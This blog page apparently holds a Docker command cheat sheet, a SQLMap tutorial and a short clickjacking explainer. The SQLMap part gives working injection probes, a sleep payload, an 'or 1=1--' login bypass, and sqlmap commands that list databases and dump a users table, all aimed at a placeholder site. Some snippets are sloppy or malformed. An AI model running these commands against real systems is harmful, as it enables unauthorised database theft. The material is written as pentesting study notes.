Posts

Showing posts from November, 2022

Basics of Docker Image

Basic Docker Image Commands

Pull the docker image from the online resource:
    docker pull <docker-image>

List all Docker containers on the machine (docker ps lists containers, not images):
    docker ps -a

Remove a Docker container from the machine:
    docker rm --force <docker-image>

Stop a Docker container on the machine:
    docker container stop <docker-image>

Start a Docker container on the machine:
    docker container start <docker-image>

Remove all Docker containers from the machine:
    docker rm -f $(docker ps -a -q)

SQLMap | Shahul Hameed

SQLMap

Copy the request from Burp Suite and paste it into a .txt file.

Type - 1

Safest technique:
    level 1 & risk 1
    level 1 & risk 2
    level 2 & risk 1
    level 2 & risk 2

Commands:
    sqlmap -r test.txt --banner
    sqlmap -r test.txt --banner --level 2 --risk 1
    sqlmap -r test.txt --banner --dbms=PostgreSQL --level 2 --risk 1  => if you found database
    sqlmap -r test.txt --banner --dbms=PostgreSQL --level 2 --risk 1

Type - 2

Error-based SQL injection:
    https://testdemo.com/sports.php?id=1'
    https://testdemo.com/sports.php?id=2-1
    https://testdemo.com/sports.php?id=3-1
    https://testdemo.com/sports.php?id=1_sleep(11)

SQLmap tool:
    python sqlmap.py -u https://testdemo.com/sports.php?id=1 --dbs
    sqlmap -u https://testdemo.com/sports.php?id=1 --dbs
    sqlmap -u https://testdemo.com/sports.php?id=1 -D acuart --tables
    sqlmap -u https://testdemo.com/sports.php?id=1 -D acuart -T users --dump

Email = SELECT*FROM users WHERE username='or 1=1--' password='qwer

Easiest Way to Identify Clickjacking Attack | Shahul Hameed

Clickjacking

Description: Clickjacking is an attack that tricks a user into clicking a webpage element that is invisible or disguised as another element. This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online.

Impact: The user assumes that they're entering their information into a usual form, but they're actually entering it in fields the hacker has overlaid on the UI.

Link URL: https://clickjacker.io/

POC: The simplest way to identify whether our application is vulnerable to a clickjacking attack.